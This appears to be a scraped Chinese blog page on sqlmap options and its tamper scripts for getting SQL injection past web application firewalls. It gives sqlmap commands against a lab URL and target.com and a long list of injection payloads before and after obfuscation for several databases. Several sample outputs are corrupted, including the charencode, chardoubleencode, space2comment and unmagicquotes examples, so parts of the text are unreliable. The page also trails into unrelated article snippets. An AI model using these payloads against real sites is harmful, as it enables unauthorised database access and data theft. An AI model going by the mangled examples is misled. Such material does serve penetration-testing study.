-p参数

指定扫描的参数 ,使--level失效

-p“user-agent,refer”这些参数也可以通过-p来指定

sqlmap.py -u "http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=admin&user-info-php-submit-button=View+Account+Details" -p "username,user-agent" --dbs

这里我们指定是对 参数 “username,user-agent”的扫描 虽然这里level没有指向到3 但是由于我们指定了 user-agent所以他还是回去扫描

--skip="id,user-agent" --level=5

这是一个排除指定扫描参数 除了skip值里面的参数 其他全部都扫描

sqlmap -u "畸形url值*”

这是一个变量的值 跟在/后面 所以 手动找出变量后 变量后面加*

--dbms 尝试每一种数据库

可以指定参数  --dbms="mysql"

--os(指定操作系统)

Linux 和windows

--invalid-bignum / --invalid-logical

通常sqlmap使用负值使参数失效 id=->id=-

bignum使用大数使参数失效id=

Logical使用布尔判断使取值失效

--no-cast
可以关掉 榨取数据

--no-escape

出于混淆和避免出错的目的,paload中用单引号定字符串,sqlmap使用char()编码逃逸

select 'foo' --> select CHAR(102)+CHAR(111)+CHAR(111)

本参数是关闭此功能

--prefix/ --suffix

前缀和后缀

--prefix""这里我们插入的是’)一个单引号和括号 闭合ID的前缀

--suffix “”这里我们插入的事AND(’abc'='abc 用来是语句为真 并且闭合后面的括号

拼接后的语句在上图的最后一行

--tamper(经常使用 的脚本绕过 )

混淆脚本 ,用于绕过应用层过滤/ips

      apostrophemask.py     用utf8代替引号     ("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
base64encode.py 用base64编码替换 ("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
multiplespaces.py 围绕SQL关键字添加多个空格 ('1 UNION SELECT foobar')
'1 UNION SELECT foobar'
space2plus.py 用+替换空格 ('SELECT id FROM users')
'SELECT+id+FROM+users'
nonrecursivereplacement.py 双重查询语句。取代predefined SQL关键字with表示
suitable for替代(例如 .replace(“SELECT”、”")) filters ('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'
space2randomblank.py 代替空格字符(“”)从一个随机的空
白字符可选字符的有效集 ('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'
unionalltounion.py 替换UNION ALL SELECT UNION SELECT ('-1 UNION ALL SELECT')
'-1 UNION SELECT'
securesphere.py 追加特制的字符串 ('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"
mssql space2hash.py 绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)
'1 AND 9227=9227'
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
equaltolike.py like 代替等号
* Input: SELECT * FROM users WHERE id=
* Output: SELECT * FROM users WHERE id LIKE
space2mssqlblank.py(mssql) 空格替换为其它空符号 Input: SELECT id FROM users
Output: SELECT%08id%02FROM%0Fusers
space2mssqlhash.py 替换空格 ('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
between.py 用between替换大于号(>) ('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
percentage.py asp允许每个字符前面添加一个%号 * Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
sp_password.py 追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾 ('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
charencode.py url编码 * Input: SELECT FIELD FROM%20TABLE
* Output: %%%4c%%%%%%%%4c%%%%%4f%4d%%%%%4c%
randomcase.py 随机大小写 * Input: INSERT
* Output: InsERt
charunicodeencode.py 字符串 unicode 编码 * Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
space2comment.py Replaces space character (‘ ‘) with comments ‘/**/’ * Input: SELECT id FROM users
* Output: SELECT//id//FROM/**/users
mysql >= 5.1. equaltolike.py like 代替等号
* Input: SELECT * FROM users WHERE id=
* Output: SELECT * FROM users WHERE id LIKE
greatest.py 绕过过滤’>’ ,用GREATEST替换大于号。 ('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
apostrophenullencode.py 绕过过滤双引号,替换字符和双引号。 tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271'
ifnull2ifisnull.py 绕过对 IFNULL 过滤。
替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’ ('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'
space2mssqlhash.py 替换空格 ('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
modsecurityversioned.py 过滤空格,包含完整的查询版本注释 ('1 AND 2>1--')
'1 /*!30874AND 2>1*/--'
space2mysqlblank.py 空格替换其它空白符号(mysql) Input: SELECT id FROM users
Output: SELECT%0Bid%0BFROM%A0users
between.py 用between替换大于号(>) ('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
modsecurityzeroversioned.py 包含了完整的查询与零版本注释 ('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'
space2mysqldash.py 替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’) ('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
bluecoat.py 代替空格字符后与一个有效的随机空白字符的SQL语句。
然后替换=为like ('SELECT id FROM users where id = 1')
'SELECT%09id FROM users where id LIKE 1'
percentage.py asp允许每个字符前面添加一个%号 * Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
charencode.py url编码 * Input: SELECT FIELD FROM%20TABLE
* Output: %%%4c%%%%%%%%4c%%%%%4f%4d%%%%%4c%
randomcase.py 随机大小写 * Input: INSERT
* Output: InsERt
versionedkeywords.py Encloses each non-function keyword with versioned MySQL comment * Input: UNION ALL SELECT NULL, NULL, CONCAT(CHAR(,,,,),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR()),CHAR(,,,,))#
* Output: /*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(,,,,),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR()),CHAR(,,,,))#
space2comment.py Replaces space character (‘ ‘) with comments ‘/**/’ * Input: SELECT id FROM users
* Output: SELECT//id//FROM/**/users
charunicodeencode.py 字符串 unicode 编码 * Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
versionedmorekeywords.py 注释绕过 * Input: UNION ALL SELECT NULL, NULL, CONCAT(CHAR(,,,,),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR()),CHAR(,,,,))#
* Output: /*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(,,,,),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/()),/*!CHAR*/(,,,,))#
MySQL < 5.1 halfversionedmorekeywords.py 关键字前加注释 * Input: value’ UNION ALL SELECT CONCAT(CHAR(,,,,),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR()),CHAR(,,,,)), NULL, NULL# AND ‘QDWa’='QDWa
* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa
20 halfversionedmorekeywords.py 当数据库为mysql时绕过防火墙,每个关键字之前添加
mysql版本评论 1.("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
2."value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
MySQL >= 5.1.13 21 space2morehash.py 空格替换为 #号 以及更多随机字符串 换行符 * Input: 1 AND 9227=9227
* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Oracle 1 greatest.py 绕过过滤’>’ ,用GREATEST替换大于号。 ('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
2 apostrophenullencode.py 绕过过滤双引号,替换字符和双引号。 tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271'
3 between.py 用between替换大于号(>) ('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
4 charencode.py url编码 * Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
5 randomcase.py 随机大小写 * Input: INSERT
* Output: InsERt
6 charunicodeencode.py 字符串 unicode 编码 * Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
7 space2comment.py Replaces space character (‘ ‘) with comments ‘/**/’ * Input: SELECT id FROM users
* Output: SELECT//id//FROM/**/users
PostgreSQL greatest.py 绕过过滤’>’ ,用GREATEST替换大于号。 ('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
apostrophenullencode.py 绕过过滤双引号,替换字符和双引号。 tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271'
between.py 用between替换大于号(>) ('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
percentage.py asp允许每个字符前面添加一个%号 * Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
charencode.py url编码 * Input: SELECT FIELD FROM%20TABLE
* Output: %%%4c%%%%%%%%4c%%%%%4f%4d%%%%%4c%
randomcase.py 随机大小写 * Input: INSERT
* Output: InsERt
charunicodeencode.py 字符串 unicode 编码 * Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
space2comment.py Replaces space character (‘ ‘) with comments ‘/**/’ * Input: SELECT id FROM users
* Output: SELECT//id//FROM/**/users
Access appendnullbyte.py 在有效负荷结束位置加载零字节字符编码 ('1 AND 1=1')
'1 AND 1=1%00'
其他 chardoubleencode.py 双url编码(不处理以编码的) * Input: SELECT FIELD FROM%20TABLE
* Output: %%%254c%%%%%%%%254c%%%%%254f%254d%%%%%254c%
unmagicquotes.py 宽字符绕过 GPC addslashes * Input: ′ AND =
* Output: %bf% AND =–%20 多个一起使用的方法
sqlmap.py -u“1.1.1.1” --tamper "1.py,2.py,3.py" -v 3 --dbs他会按顺序使用这些脚本
    • 使用sqlmap中tamper脚本绕过waf

      11-03 7331

    • STL文件序列化读取

      03-11 7571

 
    • VulnHub渗透实战Billu_b0x

      06-06 1571

    • js获取浏览器信息和客户端硬件信息(一)

      09-18 10931

    • 用C语言实现有限状态机--读《C专家编程》

      01-09 25979

    • sqlmap 绕过防火墙的tamper脚本大全

      07-02 280

    • Sqlmap Tamper大全

      08-10 2898

    • sqlmap注入之tamper绕过WAF防火墙过滤

      05-19 8508

    • sqlmap tamper 细读

      09-13 1407

    • SNMP协议详解<二>

      10-29 150339

    • Java WEB 分页实现

      04-16 29753

 
  • 连续特征离散化和归一化

    06-25 52357

  • 【Unity3D Shader编程】之二 雪山飞狐篇:Unity的基本Shader...

    11-09 81087

  • SQLMAP tamper WAF 绕过脚本列表注释

    11-22 1785

  • sqlmap过waf脚本及目录介绍

    04-26 3010

  • sqlmap 绕过防火墙的tamper脚本

    07-12 2207

  • sqlmap 的源码学习笔记二之编写tamper脚本

    08-21 3693

  • sqlmap中tamper脚本绕过waf、防火墙获得数据库信息

    06-19 250

  • sqlmap的tamper问题

    05-24 599

  • SQLMAP自带的绕过脚本 --tamper详解

    03-04 42

  • SQLMAP渗透笔记之绕过WAF防火墙

    12-26 4945

  • 【渗透实战】sqlmap_修改tamper脚本_绕过WAF并制作通杀0day

    02-14 685

  • WAF绕过的各种姿势

    10-23 434

  • 使用sqlmap 绕过防火墙进行注入测试

    04-20 28117

  • 【SQL注入/WAF】使用sqlmap 绕过防火墙进行注入测试

    04-15 694

  • sqlmap tamper绕过WAF

    01-07 868

  • SQLmap简介以及防火墙绕过方法

    09-23 1220

  • WAF自动化暴破(绕过)脚本xwaf

    02-23 1385

  • Sqlmap 使用tamper脚本绕过waf (一)

    07-16 1033

  • 深入理解SQL注入绕过WAF和过滤机制

    03-13 7422


sqlmap --tamper 绕过WAF脚本分类整理

2017年01月29日 21:57:18 whatday 阅读数:20629 标签: sqlmap
 


每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。





但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。


sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。


当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。


所以有的时候我们会发现,注入成功了但是dump不出数据,很可能是select被过滤了等等原因。


如何判断使用哪个脚本


最简单的办法就是在url参数中手工带入关键词,判断是否被过滤。


如图:


直接加个单引号被过滤,说明注入时单引号是没法用的。



空格、等于号都没有过滤,成功报错。



select被过滤。


以此类推,当sqlmap注入出现问题时,比如不出数据,就要检查对应的关键词是否被过滤。


比如空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等。


下面对于sqlmap的tamper参数详细讲解。


使用方法


根据实际情况,可以同时使用多个脚本,使用-v参数可以看到payload的变化。



sqlmap.py -u "http://www.target.com/test.php?id=12" --dbms mysql --tamper "space2comment,versionedmorekeywords.py"  -v 3 --dbs

 

SQLMAP自注入--INJECTION TECGBUQUES FINGERPRINT的更多相关文章

  1. 小白日记45:kali渗透测试之Web渗透-SqlMap自动注入(三)-sqlmap参数详解-Optimization,Injection,Detection,Techniques,Fingerprint

    sqlmap自动注入 Optimization [优化性能参数,可提高效率] -o:指定前三个参数(--predict-output.--keep-alive.--null-connection) - ...

  2. 小白日记46:kali渗透测试之Web渗透-SqlMap自动注入(四)-sqlmap参数详解- Enumeration,Brute force,UDF injection,File system,OS,Windows Registry,General,Miscellaneous

    sqlmap自动注入 Enumeration[数据枚举] --privileges -U username[CU 当前账号] -D dvwa -T users -C user --columns  [ ...

  3. 小白日记44:kali渗透测试之Web渗透-SqlMap自动注入(二)-sqlmap参数详解REQUEST

    Sqlmap自动注入(二) Request ################################################### #inurl:.php?id= 1. 数据段:--d ...

  4. 小白日记43:kali渗透测试之Web渗透-SqlMap自动注入(一)-sqlmap参数详解TARGET

    SqlMap自动注入(一) sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞[动态页面中get/post参数.cookie.HTTP头].它由Python语言开发 ...

  5. dvwa——sql手动注入和sqlmap自动注入

    手动注入 low: 源码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; ...

  6. 注入(Injection)

    注入(Injection)是: Java EE提供了注入机制,使您的对象能够获取对资源和其他依赖项的引用,而无需直接实例化它们.通过使用将字段标记为注入点的注释之一来装饰字段或方法,可以在类中声明所需 ...

  7. 风炫安全WEB安全学习第十八节课 使用SQLMAP自动化注入(二)

    风炫安全WEB安全学习第十八节课 使用SQLMAP自动化注入(二) –is-dba 当前用户权限(是否为root权限) –dbs 所有数据库 –current-db 网站当前数据库 –users 所有 ...

  8. 风炫安全WEB安全学习第十七节课 使用Sqlmap自动化注入(一)

    风炫安全WEB安全学习第十七节课 使用Sqlmap自动化注入(一) sqlmap的使用 sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器.它具有强大的检测 ...

  9. SQL学习之SqlMap SQL注入

    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了. 今天把我一 ...

随机推荐

  1. 从入门到自闭之Python函数初识

    函数初识 定义:def--关键字 ​ 将某个功能封装到一个空间中就是一个函数 功能: ​ 减少重复代码 函数的调用 ​ 函数名+():调用函数和接收返回值 函数的返回值 return 值 == 返回值 ...

  2. 分布式唯一ID生成器Twitter

    分布式系统中,有一些需要使用全局唯一ID的场景,这种时候为了防止ID冲突可以使用36位的UUID,但是UUID有一些缺点,首先他相对比较长,另外UUID一般是无序的. 有些时候我们希望能使用一种简单一 ...

  3. Zabbix 配置Python邮件告警

    1.首先你应该注册一个163邮箱,用于发信,再注册时开启SMTP/POP3功能,使用加密密码认证. 2.在Zabbix主机上新建send.py文件,将以下代码复制编辑,设置发件用户.密码. [root ...

  4. Codeforces 1190A. Tokitsukaze and Discard Items

    传送门 显然从左到右考虑每个要删除的数 维护一个 $cnt$ 表示之前已经删除了 $cnt$ 个数,那么当前所有要删除数的实际位置就要减去 $cnt$ 直接暴力枚举哪些数在最左边一个块然后一起删除 每 ...

  5. AWS In Action

    Core Services of AWS Elastic Cloud Compute(EC2) Simple Storage Service(S3) Relational Database Servi ...

  6. 【Activiti】crm与工作流的整合,一个完整的流程实例创建到任务完成的过程

    1.建立任务列表页面--根据用户的nickName作为assignee查询其所拥有的任务列表 2.在任务后添加办理按钮 3.点击办理按钮,出现流程办理框,其中详细显示了该任务的相关详细信息,本实例中为 ...

  7. 浏览器进程线程时间循环、与vue netTick的实现原理

    浏览器事件循环(结合vue nextTick)https://juejin.im/post/5cb736c5f265da039955d4e8#comment messageChanel的讲解https ...

  8. 多线程编程-- part5.1 互斥锁之非公平锁-获取与释放

    非公平锁之获取锁 非公平锁和公平锁在获取锁的方法上,流程是一样的:它们的区别主要表现在“尝试获取锁的机制不同”.简单点说,“公平锁”在每次尝试获取锁时,都是采用公平策略(根据等待队列依次排序等待):而 ...

  9. shell cat EOF 变量自动解析问题

    使用如下shell安装node时,一直提示 command not found wget https://mirrors.huaweicloud.com/nodejs/latest-v8.x/node ...

  10. springboot中使用servlet通过配置类

    在servlet目录下创建个servlet类,示例代码如下: package com.bjpowernode.springboot.servlet; import javax.servlet.Serv ...